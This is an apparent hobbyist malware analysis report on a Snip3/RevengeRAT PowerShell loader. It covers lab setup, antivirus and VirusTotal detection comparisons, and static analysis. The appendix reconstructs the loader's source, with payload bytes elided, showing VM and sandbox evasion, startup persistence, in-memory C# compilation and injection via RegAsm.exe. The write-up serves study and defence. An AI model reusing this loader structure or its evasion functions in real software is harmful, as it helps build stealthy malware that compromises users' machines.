<h1 id="snip3---revengerat-part1">Snip3 - RevengeRAT <em>(part1)</em></h1>
<h2 id="preamble">Preamble</h2>
<p>Running this analysis from scratch, I started by configuring a laboratory environment by myself, not using a pre-made one like <a href="https://www.fireeye.com/services/freeware/flare-vm.html">Flare VM</a>. For this, I’ve processed as follows.</p>
<p>I downloaded a Windows 10 premade Virtual Machine from <a href="developer.microsoft.com">developer.microsoft.com</a> (W7 VM I tried were not up to date enough to support some of the software used). I updated my VirtualBox hypervisor to the last 6.1 version. And, after having set up the VM as a lab environment, I’ve downloaded a bunch of useful malware analysis tools like <em>UVK, MalwareBytes, VT Hash Check, PEstudio, PeiD, CFF Explorer</em>, along with some malware samples. Indeed, since the first section of this part 1 is about automated malware detection tools, I ran these tools on more than one single malware in order to have a relevant review on this method. Trying with only the malware under analysis (the n°5 by the way) would have been uninteresting.</p>
<p>At last, I added random files containing fake information like fake contacts, new directories, common software not linked to malware analysis, new text files with fake drafts or other fake sensible information. Then, I backed up my whole host file system on two external drives, unzipped malware into the <em>Documents</em> directory, checked analysis software were working and made some initial snapshots of the virtual machine.</p>
<h2 id="anti-malware-tools">Anti-malware tools</h2>
<h3 id="general-detection-software">General detection software</h3>
<p>In this part, I realised I had made some benchmarking of malware detection tools! Actually I didn’t have enough malware to perform a proper benchmark (~9 malware) but guiding principles and general results remain pretty good. I’ve tried four detection tools on the current samples: the <em>by-default</em> <a href="https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows?view=o365-worldwide">Windows Defender</a> through the quick scan of its virus &amp; threat protection functionality, <a href="https://duckduckgo.com/?q=ultra+virus+killer">Ultra Virus Killer aka UVK</a> with its threat scanner, <a href="https://www.malwarebytes.com/premium">MalwareBytes</a> in its Premium Trial version and <a href="https://www.avast.com/en-us/avast-one-t2">Avast One antivirus</a>. Here are the results I got.</p>
<table>
<colgroup>
<col style="width: 31%" />
<col style="width: 8%" />
<col style="width: 15%" />
<col style="width: 43%" />
</colgroup>
<thead>
<tr class="header">
<th>Tool name</th>
<th>Results</th>
<th>Time to scan</th>
<th>Comments on identifications</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>Windows Defender</td>
<td>0/9</td>
<td>~20s</td>
<td></td>
</tr>
<tr class="even">
<td>UVK</td>
<td>0/9</td>
<td>~30s</td>
<td></td>
</tr>
<tr class="odd">
<td>MalwareBytes</td>
<td>5/9 + 1 external</td>
<td>~390s (6min30s)</td>
<td>2 Trojan DLL + 3 files labelled <em>Malware</em></td>
</tr>
<tr class="even">
<td>Avast One initial Smart Scan</td>
<td>0/9</td>
<td>~20s</td>
<td></td>
</tr>
<tr class="odd">
<td>Avast One scan from <em>Documents</em> directory</td>
<td>7/9</td>
<td>~5s</td>
<td>3 Trojan Win32 + 2 Dropper (Win32&amp;PwrSh) + 2 <em>Malware</em> (Win32&amp;VBS)</td>
</tr>
</tbody>
</table>
<h3 id="virustotal">VirusTotal</h3>
<p>In this section, only the website <a href="virustotal.com">virustotal.com</a> was used. On this single website, anyone can find lots of information related to any piece of software you got: which security companies detected it, properties like hashes, signatures, names, copyrights, which online services are accessed by the alleged malware, complete description of behaviors and even comments from a community of malware analysts.</p>
<p>And for all of that, you only need to drop on their website the pieces of software you want plenty of information about. For each of my sample, here are a sum up of what I’ve learnt about them through this website:</p>
<table>
<thead>
<tr class="header">
<th>Sample n°</th>
<th>N° of companies identifying a malware</th>
<th>alleged file type</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>1</td>
<td>56/72</td>
<td>EXE</td>
</tr>
<tr class="even">
<td>2</td>
<td>44/68</td>
<td>EXE</td>
</tr>
<tr class="odd">
<td>3</td>
<td>48/71</td>
<td>EXE</td>
</tr>
<tr class="even">
<td>4</td>
<td>31/60</td>
<td>MS Excel Spreadsheet</td>
</tr>
<tr class="odd">
<td>5</td>
<td>29/59</td>
<td>PowerShell Script</td>
</tr>
<tr class="even">
<td>6</td>
<td>30/59</td>
<td>Windows Shortcut</td>
</tr>
<tr class="odd">
<td>7</td>
<td>48/69</td>
<td>DLL</td>
</tr>
<tr class="even">
<td>8</td>
<td>46/70</td>
<td>DLL</td>
</tr>
<tr class="odd">
<td>9</td>
<td>52/70</td>
<td>EXE</td>
</tr>
</tbody>
</table>
<p>A thing is clear, results are way better through virustotal.com, since this service is using analyses from plenty of security vendors. It is thus obviously more efficient to use this tool rather than few isolated security solutions, as it was done in the previous sub-section.</p>
<h2 id="static-malware-analysis">Static malware analysis</h2>
<p>Ending with automated malware detection software, from there I only focused on one sample which questioned me more than others, the so-called PowerShell script. Since my sample was hashed, without any extension and that I was performing some static analysis, the first goal was to confirm it was well a PowerShell script. I opened it with PEStudio to see what I could learn from them by myself.</p>
<h3 id="sample-n5-a-powershell-script">Sample n°5: a PowerShell Script</h3>
<p>PEStudio provided me with four output tabs. There was the main one, where can be found various pieces of information like file hashes or entropy for identifying packed malware. Then came two tabs <em>indicators</em>, which prints a quantified summary of general and suspicious data, and <em>virustotal</em> but this one was not useful because it was dealt under the previous section. The last tab was a very interesting one, <em>strings</em>, in which some raw data of the file is converted by PEStudio into “comprehensible” data, strings.</p>
<p>This is the tab in which I learnt the most even though few rows were displayed: only 12. So this part of the analysis was pretty much about reading the file directly as it was! From the binary ascii decoding (only ascii this time, no base64 or unicode strings like sometimes), one may see some shell-like commands. Noticing the syntax of some values that look like commands (uppercases starting words, parameter use, only “-” with complete parameter name and so), I started identifying PowerShell commands. For example, <code>Add-Type</code> was given four times with each time the parameter <code>-AssemblyName</code>, so I was able to check the Microsoft documentation to confirm this was well PowerShell commands, and by the way, to try to understand what was done. <a href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/add-type?view=powershell-7.2">From online Microsoft documentation</a>, this command was described, and few things could be learnt:</p>
<ul>
<li>The <code>Add-Type</code> cmdlet lets you define a Microsoft .NET Core class in your PowerShell session. It is a kind of <em>import</em> command in some programming languages.</li>
<li><code>-AssemblyName</code> parameter stands for pointing an assembly which contains the wanted class by its name rather than its path.</li>
</ul>
<p>To structure a bit the analysis, these lines occurred at the very beginning of the file. It is thus coherent that four of these lines were written at the beginning of the malware. It was importing following namespaces, referring to various “libraries”:</p>
<ul>
<li>System.Windows.Forms, which contains class for creating Windows-based applications that take full advantage of the rich user interface features available in MS OS.</li>
<li>Microsoft.VisualBasic, which contains types that support the Visual Basic Runtime in Visual Basic. In other words, in order to run code written in <a href="https://en.wikipedia.org/wiki/Visual_Basic_.NET">Visual Basic programming language</a>.</li>
<li>Microsoft.CSharp, which contains classes that support compilation and code generation using the <a href="https://en.wikipedia.org/wiki/C_Sharp_(programming_language)">C# language</a>, so approximately the same goal as the previous point but for a different language of the Windows environment for Windows / .NET software development.</li>
<li>System.Management Namespace, which provides access to a rich set of management information and management events about the system, devices, and applications instrumented to the <a href="https://docs.microsoft.com/en-us/windows/win32/wmisdk/about-wmi">Windows Management Instrumentation (WMI) infrastructure</a>.</li>
</ul>
<p>Then, some variables were defined:</p>
<ul>
<li><code>$RUNPE</code>, an array of bytes, that I might convert to something more readable if needed.</li>
<li><code>$StartupCheck</code> and <code>$StartupName</code>, kind of two aliases towards respectively Startup &amp; UpName.</li>
<li><code>$Startup</code>, a new string defined from a smaller array of bytes.</li>
</ul>
<p>And then came many functions definitions. So, I copied strings into a code editor to have some PowerShell commands highlighting and I reformatted the code into something more readable. I replaced “/n/r” characters by inserting a real newline, I added indentation and so on. Since I’ve reunited the code, <a href="#app1">I let it in the appendix of the current report</a>.</p>
<p>Everything should be correct, excepts binary or bytes data inside variables, since I hadn’t plan to execute the code during static analysis. I could have deciphered these “input” data but I didn’t because, to be honest, making a description of proper functions was pretty enough to guess how the malware works. Indeed, a quick overview of these functions let me know a lot:</p>
<ul>
<li><code>Binary2String([String] $data)</code> which converts binary data into proper ascii strings <em>(it seems to be one of the main obfuscation techniques used in this malicious script)</em>.</li>
<li><code>Decompress</code> &amp; <code>CodeDom</code> which are the main functions here, the huge first array of bytes is decompressed and the csharp code supposedly obtained is compiled into, I guess, a main malware, this script not being the main malware by itself <em>-I mean which will harm-</em> but saying it in a very simple way, its sources and its compiler.</li>
<li>Two extra functions are particularly interesting, <code>VirtualMachineDetector()</code> and <code>DetectSandboxie()</code> (which depends on <code>ModuleHandle([String] $ModuleName)</code>). Their names are quite straightforward: these are also obfuscation techniques which consist in trying to check if the malware is running into a VM or a sandboxed environment. If so, malware exit. (at least it doesn’t delete himself, it could have been worse for the malware analyst rookie I am!)</li>
</ul>
<p>At last, it can be noticed that the current malware should actually run into a VM or a sandboxed environment because some comments were added to very specific lines to prevent it to exit. Some malware analyst/researcher/lecturer/… may have altered the malware before sharing it.</p>
<h2 id="appendix">Appendix</h2>
<h3 id="app1">PowerShell code</h3>
<div class="sourceCode" id="cb1"><pre class="sourceCode ps1"><code class="sourceCode powershell"><a class="sourceLine" id="cb1-1" title="1"><span class="fu">Add-Type</span> -AssemblyName System.<span class="fu">Windows</span>.<span class="fu">Forms</span></a>
<a class="sourceLine" id="cb1-2" title="2"><span class="fu">Add-Type</span> -AssemblyName Microsoft.<span class="fu">VisualBasic</span></a>
<a class="sourceLine" id="cb1-3" title="3"><span class="fu">Add-Type</span> -AssemblyName Microsoft.<span class="fu">CSharp</span></a>
<a class="sourceLine" id="cb1-4" title="4"><span class="fu">Add-Type</span> -AssemblyName System.<span class="fu">Management</span></a>
<a class="sourceLine" id="cb1-5" title="5"></a>
<a class="sourceLine" id="cb1-6" title="6">[<span class="dt">Byte</span>[]] <span class="va">$RUNPE</span> = @(31,...)</a>
<a class="sourceLine" id="cb1-7" title="7">[<span class="dt">String</span>] <span class="va">$StartupCheck</span> = <span class="st">&quot;%Startup%&quot;</span></a>
<a class="sourceLine" id="cb1-8" title="8">[<span class="dt">String</span>] <span class="va">$StartupName</span> = <span class="st">&quot;%UpName%&quot;</span></a>
<a class="sourceLine" id="cb1-9" title="9">[<span class="dt">String</span>] <span class="va">$Startup</span> = [System.<span class="fu">Text</span>.<span class="fu">Encoding</span>]::Default.<span class="fu">GetString</span>(@(118,...))</a>
<a class="sourceLine" id="cb1-10" title="10"></a>
<a class="sourceLine" id="cb1-11" title="11"><span class="kw">Function</span> Binary2String([<span class="dt">String</span>] <span class="va">$data</span>) {</a>
<a class="sourceLine" id="cb1-12" title="12">    <span class="va">$byteList</span> = [System.<span class="fu">Collections</span>.<span class="fu">Generic</span>.<span class="fu">List</span>[<span class="dt">Byte</span>]]::new()</a>
<a class="sourceLine" id="cb1-13" title="13">    <span class="kw">for</span> (<span class="va">$i</span> = 0; <span class="va">$i</span> -lt <span class="va">$data</span>.<span class="fu">Length</span>; <span class="va">$i</span> +=8) {</a>
<a class="sourceLine" id="cb1-14" title="14">        <span class="va">$byteList</span>.<span class="fu">Add</span>([Convert]::ToByte(<span class="va">$data</span>.<span class="fu">Substring</span>(<span class="va">$i</span>, 8), 2))</a>
<a class="sourceLine" id="cb1-15" title="15">    }</a>
<a class="sourceLine" id="cb1-16" title="16">    <span class="kw">return</span> [System.<span class="fu">Text</span>.<span class="fu">Encoding</span>]::ASCII.<span class="fu">GetString</span>(<span class="va">$byteList</span>.<span class="fu">ToArray</span>())</a>
<a class="sourceLine" id="cb1-17" title="17">}</a>
<a class="sourceLine" id="cb1-18" title="18"></a>
<a class="sourceLine" id="cb1-19" title="19"><span class="kw">Function</span> INSTALL() {</a>
<a class="sourceLine" id="cb1-20" title="20">    [<span class="dt">String</span>] <span class="va">$VBSRun</span> = [System.<span class="fu">Text</span>.<span class="fu">Encoding</span>]::Default.<span class="fu">GetString</span>(@(83,..))</a>
<a class="sourceLine" id="cb1-21" title="21">    [System.<span class="fu">IO</span>.<span class="fu">File</span>]::WriteAllText(</a>
<a class="sourceLine" id="cb1-22" title="22">        ([System.<span class="fu">Environment</span>]::GetFolderPath(7) + <span class="st">&quot;\&quot;</span> + <span class="va">$StartupName</span>),</a>
<a class="sourceLine" id="cb1-23" title="23">        <span class="va">$VBSRun</span>.<span class="fu">Replace</span>(<span class="st">&quot;%FilePath%&quot;</span>, <span class="va">$PSCommandPath</span>))</a>
<a class="sourceLine" id="cb1-24" title="24">}</a>
<a class="sourceLine" id="cb1-25" title="25"></a>
<a class="sourceLine" id="cb1-26" title="26"><span class="kw">Function</span> Decompress {</a>
<a class="sourceLine" id="cb1-27" title="27">    ascii,36,0x0000311A,-,-,[CmdletBinding()]</a>
<a class="sourceLine" id="cb1-28" title="28">    <span class="kw">Param</span> (</a>
<a class="sourceLine" id="cb1-29" title="29">        ascii,153,0x0000313A,-,-,[Parameter(</a>
<a class="sourceLine" id="cb1-30" title="30">            Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]</a>
<a class="sourceLine" id="cb1-31" title="31">        [<span class="dt">byte</span>[]] <span class="va">$byteArray</span> = $(<span class="kw">Throw</span>(<span class="st">&quot;-byteArray is required&quot;</span>))</a>
<a class="sourceLine" id="cb1-32" title="32">    )</a>
<a class="sourceLine" id="cb1-33" title="33">    ascii,83,0x000031D0,-,utility,<span class="kw">Process</span> {</a>
<a class="sourceLine" id="cb1-34" title="34">        <span class="va">$input</span> = <span class="fu">New-Object</span> System.<span class="fu">IO</span>.<span class="fu">MemoryStream</span>( , <span class="va">$byteArray</span> )</a>
<a class="sourceLine" id="cb1-35" title="35">        ascii,175,0x00003220,-,-,    <span class="va">$output</span> = <span class="fu">New-Object</span> System.<span class="fu">IO</span>.<span class="fu">MemoryStream</span></a>
<a class="sourceLine" id="cb1-36" title="36">        <span class="va">$gzipStream</span> = <span class="fu">New-Object</span> System.<span class="fu">IO</span>.<span class="fu">Compression</span>.<span class="fu">GzipStream</span> <span class="va">$input</span>, (</a>
<a class="sourceLine" id="cb1-37" title="37">            [IO.<span class="fu">Compression</span>.<span class="fu">CompressionMode</span>]::Decompress)</a>
<a class="sourceLine" id="cb1-38" title="38">    ascii,68,0x000032CC,-,-,    <span class="va">$gzipStream</span>.<span class="fu">CopyTo</span>( <span class="va">$output</span> )</a>
<a class="sourceLine" id="cb1-39" title="39">        <span class="va">$gzipStream</span>.<span class="fu">Close</span>()</a>
<a class="sourceLine" id="cb1-40" title="40">        ascii,86238,0x00018358,-,format-string,[<span class="dt">byte</span>[]] <span class="va">$byteOutArray</span> =</a>
<a class="sourceLine" id="cb1-41" title="41">            <span class="va">$output</span>.<span class="fu">ToArray</span>()</a>
<a class="sourceLine" id="cb1-42" title="42">        <span class="kw">return</span> <span class="va">$byteOutArray</span></a>
<a class="sourceLine" id="cb1-43" title="43">    }</a>
<a class="sourceLine" id="cb1-44" title="44">}</a>
<a class="sourceLine" id="cb1-45" title="45"></a>
<a class="sourceLine" id="cb1-46" title="46"><span class="kw">Function</span> ModuleHandle([<span class="dt">String</span>] <span class="va">$ModuleName</span>) {</a>
<a class="sourceLine" id="cb1-47" title="47">    <span class="va">$SystemAssembly</span> = [AppDomain]::CurrentDomain.<span class="fu">GetAssemblies</span>() |</a>
<a class="sourceLine" id="cb1-48" title="48">    <span class="fu">Where-Object</span> {</a>
<a class="sourceLine" id="cb1-49" title="49">        <span class="va">$_</span>.<span class="fu">GlobalAssemblyCache</span> -And <span class="va">$_</span>.<span class="fu">Location</span>.<span class="fu">Split</span>(&#39;\\&#39;)[-1].<span class="fu">Equals</span>(&#39;System.<span class="fu">dll</span>&#39;)</a>
<a class="sourceLine" id="cb1-50" title="50">    }</a>
<a class="sourceLine" id="cb1-51" title="51">    <span class="va">$UnsafeNativeMethods</span> = <span class="va">$SystemAssembly</span>.<span class="fu">GetType</span>(</a>
<a class="sourceLine" id="cb1-52" title="52">        (Binary2String(&#39;,.,....&#39;.<span class="fu">Replace</span>(<span class="st">&quot;,&quot;</span>, <span class="st">&quot;0&quot;</span>).<span class="fu">Replace</span>(<span class="st">&quot;.&quot;</span>, <span class="st">&quot;1&quot;</span>))))</a>
<a class="sourceLine" id="cb1-53" title="53">    <span class="va">$GetModuleHandle</span> = <span class="va">$UnsafeNativeMethods</span>.<span class="fu">GetMethod</span>(</a>
<a class="sourceLine" id="cb1-54" title="54">        (Binary2String(&#39;,.,,,&#39;.<span class="fu">Replace</span>(<span class="st">&quot;,&quot;</span>, <span class="st">&quot;0&quot;</span>).<span class="fu">Replace</span>(<span class="st">&quot;.&quot;</span>, <span class="st">&quot;1&quot;</span>))))</a>
<a class="sourceLine" id="cb1-55" title="55">    <span class="kw">return</span> <span class="va">$GetModuleHandle</span>.<span class="fu">Invoke</span>(<span class="va">$null</span>, @(<span class="va">$ModuleName</span>))</a>
<a class="sourceLine" id="cb1-56" title="56">}</a>
<a class="sourceLine" id="cb1-57" title="57"></a>
<a class="sourceLine" id="cb1-58" title="58"><span class="kw">Function</span> VirtualMachineDetector() {</a>
<a class="sourceLine" id="cb1-59" title="59">    <span class="va">$searcher</span> = (<span class="fu">New-Object</span> System.<span class="fu">Management</span>.<span class="fu">ManagementObjectSearcher</span>(</a>
<a class="sourceLine" id="cb1-60" title="60">        (Binary2String(<span class="st">&quot;,.,.&quot;</span>.<span class="fu">Replace</span>(<span class="st">&quot;,&quot;</span>, <span class="st">&quot;0&quot;</span>).<span class="fu">Replace</span>(<span class="st">&quot;.&quot;</span>, <span class="st">&quot;1&quot;</span>)))))</a>
<a class="sourceLine" id="cb1-61" title="61">    <span class="va">$items</span> = <span class="va">$searcher</span>.<span class="fu">Get</span>()</a>
<a class="sourceLine" id="cb1-62" title="62">    <span class="va">$Tr</span> = <span class="st">&quot;&quot;</span></a>
<a class="sourceLine" id="cb1-63" title="63">    <span class="kw">foreach</span> (<span class="va">$item</span> <span class="kw">in</span> <span class="va">$items</span>) {</a>
<a class="sourceLine" id="cb1-64" title="64">        [<span class="dt">String</span>] <span class="va">$manufacturer</span> = <span class="va">$item</span>[<span class="st">&quot;Manufacturer&quot;</span>].<span class="fu">ToString</span>().<span class="fu">ToLower</span>()</a>
<a class="sourceLine" id="cb1-65" title="65">        <span class="kw">if</span> ((<span class="va">$manufacturer</span> -eq <span class="st">&quot;microsoft corporation&quot;</span></a>
<a class="sourceLine" id="cb1-66" title="66">              -and <span class="va">$item</span>[<span class="st">&quot;Model&quot;</span>].<span class="fu">ToString</span>().<span class="fu">ToUpperInvariant</span>().<span class="fu">Contains</span>(<span class="st">&quot;VIRTUAL&quot;</span>))</a>
<a class="sourceLine" id="cb1-67" title="67">              -or <span class="va">$manufacturer</span>.<span class="fu">Contains</span>(<span class="st">&quot;vmware&quot;</span>)</a>
<a class="sourceLine" id="cb1-68" title="68">              -or <span class="va">$item</span>[<span class="st">&quot;Model&quot;</span>].<span class="fu">ToString</span>() -eq <span class="st">&quot;VirtualBox&quot;</span>)</a>
<a class="sourceLine" id="cb1-69" title="69">        {</a>
<a class="sourceLine" id="cb1-70" title="70">            <span class="va">$Tr</span> = <span class="st">&quot;True&quot;</span></a>
<a class="sourceLine" id="cb1-71" title="71">        } <span class="kw">else</span> {</a>
<a class="sourceLine" id="cb1-72" title="72">            <span class="va">$Tr</span> = <span class="st">&quot;False&quot;</span></a>
<a class="sourceLine" id="cb1-73" title="73">        }</a>
<a class="sourceLine" id="cb1-74" title="74">    }</a>
<a class="sourceLine" id="cb1-75" title="75">    <span class="kw">return</span> <span class="va">$Tr</span></a>
<a class="sourceLine" id="cb1-76" title="76">}</a>
<a class="sourceLine" id="cb1-77" title="77"></a>
<a class="sourceLine" id="cb1-78" title="78"><span class="kw">Function</span> DetectSandboxie() {</a>
<a class="sourceLine" id="cb1-79" title="79">    [Int32] <span class="va">$i</span> = ModuleHandle(</a>
<a class="sourceLine" id="cb1-80" title="80">        (Binary2String(<span class="st">&quot;,.,.,&quot;</span>.<span class="fu">Replace</span>(<span class="st">&quot;,&quot;</span>, <span class="st">&quot;0&quot;</span>).<span class="fu">Replace</span>(<span class="st">&quot;.&quot;</span>, <span class="st">&quot;1&quot;</span>))))</a>
<a class="sourceLine" id="cb1-81" title="81">    [<span class="dt">String</span>] <span class="va">$s</span> = <span class="st">&quot;&quot;</span></a>
<a class="sourceLine" id="cb1-82" title="82">    <span class="kw">if</span> (<span class="va">$i</span> -eq 0) {</a>
<a class="sourceLine" id="cb1-83" title="83">        <span class="va">$s</span> = <span class="st">&quot;False&quot;</span></a>
<a class="sourceLine" id="cb1-84" title="84">    } <span class="kw">else</span> {</a>
<a class="sourceLine" id="cb1-85" title="85">        <span class="va">$s</span> = <span class="st">&quot;True&quot;</span></a>
<a class="sourceLine" id="cb1-86" title="86">    }</a>
<a class="sourceLine" id="cb1-87" title="87">    <span class="kw">return</span> <span class="va">$s</span></a>
<a class="sourceLine" id="cb1-88" title="88">}</a>
<a class="sourceLine" id="cb1-89" title="89"></a>
<a class="sourceLine" id="cb1-90" title="90"><span class="kw">Function</span> CodeDom([<span class="dt">Byte</span>[]] <span class="va">$BB</span>, [<span class="dt">String</span>] <span class="va">$TP</span>, [<span class="dt">String</span>] <span class="va">$MT</span>) {</a>
<a class="sourceLine" id="cb1-91" title="91">    <span class="va">$dictionary</span> = <span class="fu">new-object</span> &#39;System.<span class="fu">Collections</span>.<span class="fu">Generic</span>.<span class="fu">Dictionary</span>[</a>
<a class="sourceLine" id="cb1-92" title="92">        [<span class="dt">string</span>],[<span class="dt">string</span>]]&#39;</a>
<a class="sourceLine" id="cb1-93" title="93">    <span class="va">$dictionary</span>.<span class="fu">Add</span>(</a>
<a class="sourceLine" id="cb1-94" title="94">      (Binary2String(<span class="st">&quot;,.,,&quot;</span>.<span class="fu">Replace</span>(<span class="st">&quot;,&quot;</span>, <span class="st">&quot;0&quot;</span>).<span class="fu">Replace</span>(<span class="st">&quot;.&quot;</span>, <span class="st">&quot;1&quot;</span>))),</a>
<a class="sourceLine" id="cb1-95" title="95">      (Binary2String(<span class="st">&quot;011&quot;</span>)))</a>
<a class="sourceLine" id="cb1-96" title="96">    <span class="va">$CsharpCompiler</span> = <span class="fu">New-Object</span> Microsoft.<span class="fu">CSharp</span>.<span class="fu">CSharpCodeProvider</span>(<span class="va">$dictionary</span>)</a>
<a class="sourceLine" id="cb1-97" title="97">    <span class="va">$CompilerParametres</span> = <span class="fu">New-Object</span> System.<span class="fu">CodeDom</span>.<span class="fu">Compiler</span>.<span class="fu">CompilerParameters</span></a>
<a class="sourceLine" id="cb1-98" title="98">    <span class="va">$CompilerParametres</span>.<span class="fu">ReferencedAssemblies</span>.<span class="fu">Add</span>((Binary2String(&#39;01010...&#39;)))</a>
<a class="sourceLine" id="cb1-99" title="99">    <span class="va">$CompilerParametres</span>.<span class="fu">ReferencedAssemblies</span>.<span class="fu">Add</span>((Binary2String(&#39;01010...&#39;)))</a>
<a class="sourceLine" id="cb1-100" title="100">    <span class="va">$CompilerParametres</span>.<span class="fu">ReferencedAssemblies</span>.<span class="fu">Add</span>((Binary2String(&#39;01010...&#39;)))</a>
<a class="sourceLine" id="cb1-101" title="101">    <span class="va">$CompilerParametres</span>.<span class="fu">ReferencedAssemblies</span>.<span class="fu">Add</span>((Binary2String(&#39;01101...&#39;)))</a>
<a class="sourceLine" id="cb1-102" title="102">    <span class="va">$CompilerParametres</span>.<span class="fu">ReferencedAssemblies</span>.<span class="fu">Add</span>((Binary2String(&#39;01001...&#39;)))</a>
<a class="sourceLine" id="cb1-103" title="103">    <span class="va">$CompilerParametres</span>.<span class="fu">IncludeDebugInformation</span> = <span class="va">$false</span></a>
<a class="sourceLine" id="cb1-104" title="104">    <span class="va">$CompilerParametres</span>.<span class="fu">GenerateExecutable</span> = <span class="va">$false</span></a>
<a class="sourceLine" id="cb1-105" title="105">    <span class="va">$CompilerParametres</span>.<span class="fu">GenerateInMemory</span> = <span class="va">$true</span></a>
<a class="sourceLine" id="cb1-106" title="106">    <span class="va">$CompilerParametres</span>.<span class="fu">CompilerOptions</span> += (Binary2String(<span class="st">&quot;00101...&quot;</span>))</a>
<a class="sourceLine" id="cb1-107" title="107">    <span class="va">$BB</span> = Decompress(<span class="va">$BB</span>)</a>
<a class="sourceLine" id="cb1-108" title="108">    [System.<span class="fu">CodeDom</span>.<span class="fu">Compiler</span>.<span class="fu">CompilerResults</span>] <span class="va">$CompilerResults</span> =</a>
<a class="sourceLine" id="cb1-109" title="109">        <span class="va">$CsharpCompiler</span>.<span class="fu">CompileAssemblyFromSource</span>(</a>
<a class="sourceLine" id="cb1-110" title="110">            <span class="va">$CompilerParametres</span>, [System.<span class="fu">Text</span>.<span class="fu">Encoding</span>]::Default.<span class="fu">GetString</span>(<span class="va">$BB</span>))</a>
<a class="sourceLine" id="cb1-111" title="111">    [<span class="fu">Type</span>] <span class="va">$T</span> = <span class="va">$CompilerResults</span>.<span class="fu">CompiledAssembly</span>.<span class="fu">GetType</span>(<span class="va">$TP</span>)</a>
<a class="sourceLine" id="cb1-112" title="112">    [<span class="dt">Byte</span>[]] <span class="va">$Bytes</span> = Decompress(@(31,...))</a>
<a class="sourceLine" id="cb1-113" title="113">    <span class="kw">try</span>{</a>
<a class="sourceLine" id="cb1-114" title="114">        [<span class="dt">String</span>] <span class="va">$MyPt</span> = [System.<span class="fu">IO</span>.<span class="fu">Path</span>]::Combine(</a>
<a class="sourceLine" id="cb1-115" title="115">            [System.<span class="fu">Runtime</span>.<span class="fu">InteropServices</span>.<span class="fu">RuntimeEnvironment</span>]::GetRuntimeDirectory(),</a>
<a class="sourceLine" id="cb1-116" title="116">            <span class="st">&quot;RegAsm.exe&quot;</span>)</a>
<a class="sourceLine" id="cb1-117" title="117">        [<span class="dt">Object</span>[]] <span class="va">$Params</span>=@(<span class="va">$MyPt</span>.<span class="fu">Replace</span>(<span class="st">&quot;Framework64&quot;</span>,<span class="st">&quot;Framework&quot;</span>) ,<span class="va">$Bytes</span>)</a>
<a class="sourceLine" id="cb1-118" title="118">        <span class="kw">return</span> <span class="va">$T</span>.<span class="fu">GetMethod</span>(<span class="va">$MT</span>).<span class="fu">Invoke</span>(<span class="va">$null</span>, <span class="va">$Params</span>)</a>
<a class="sourceLine" id="cb1-119" title="119">    } <span class="kw">catch</span> { }</a>
<a class="sourceLine" id="cb1-120" title="120">}</a>
<a class="sourceLine" id="cb1-121" title="121"></a>
<a class="sourceLine" id="cb1-122" title="122">[<span class="dt">String</span>] <span class="va">$VMCheck</span> = VirtualMachineDetector</a>
<a class="sourceLine" id="cb1-123" title="123">[<span class="dt">String</span>] <span class="va">$SandBoxCheck</span> = DetectSandboxie</a>
<a class="sourceLine" id="cb1-124" title="124"></a>
<a class="sourceLine" id="cb1-125" title="125"><span class="kw">if</span> (<span class="va">$VMCheck</span> -eq <span class="st">&quot;True&quot;</span>) {</a>
<a class="sourceLine" id="cb1-126" title="126">    <span class="co">#exit</span></a>
<a class="sourceLine" id="cb1-127" title="127">}</a>
<a class="sourceLine" id="cb1-128" title="128"></a>
<a class="sourceLine" id="cb1-129" title="129"><span class="kw">if</span> (<span class="va">$SandBoxCheck</span> -eq <span class="st">&quot;True&quot;</span>) {</a>
<a class="sourceLine" id="cb1-130" title="130">    <span class="co">#exit</span></a>
<a class="sourceLine" id="cb1-131" title="131">}</a>
<a class="sourceLine" id="cb1-132" title="132"></a>
<a class="sourceLine" id="cb1-133" title="133">[System.<span class="fu">Threading</span>.<span class="fu">Thread</span>]::Sleep(1000)</a>
<a class="sourceLine" id="cb1-134" title="134"></a>
<a class="sourceLine" id="cb1-135" title="135"><span class="kw">if</span> (<span class="va">$StartupCheck</span> -eq <span class="st">&quot;True&quot;</span>) {</a>
<a class="sourceLine" id="cb1-136" title="136">    <span class="co">#[System.IO.File]::WriteAllText(</span></a>
<a class="sourceLine" id="cb1-137" title="137">    <span class="co">#    [Environment]::GetFolderPath(7) + &quot;\&quot; + $StartupName,</span></a>
<a class="sourceLine" id="cb1-138" title="138">    <span class="co">#    $Startup.Replace(</span></a>
<a class="sourceLine" id="cb1-139" title="139">    <span class="co">#        &quot;%PATH%&quot;, $MyInvocation.MyCommand.Definition.Replace(&quot;\&quot;, &quot;\\&quot;))</span></a>
<a class="sourceLine" id="cb1-140" title="140">    <span class="co">#)</span></a>
<a class="sourceLine" id="cb1-141" title="141">    <span class="co">#INSTALL</span></a>
<a class="sourceLine" id="cb1-142" title="142">}</a>
<a class="sourceLine" id="cb1-143" title="143"></a>
<a class="sourceLine" id="cb1-144" title="144">[System.<span class="fu">Threading</span>.<span class="fu">Thread</span>]::Sleep(1000)</a>
<a class="sourceLine" id="cb1-145" title="145">CodeDom <span class="va">$RUNPE</span> (Binary2String(<span class="st">&quot;01110...&quot;</span>)) (Binary2String(<span class="st">&quot;01000...&quot;</span>))</a></code></pre></div>
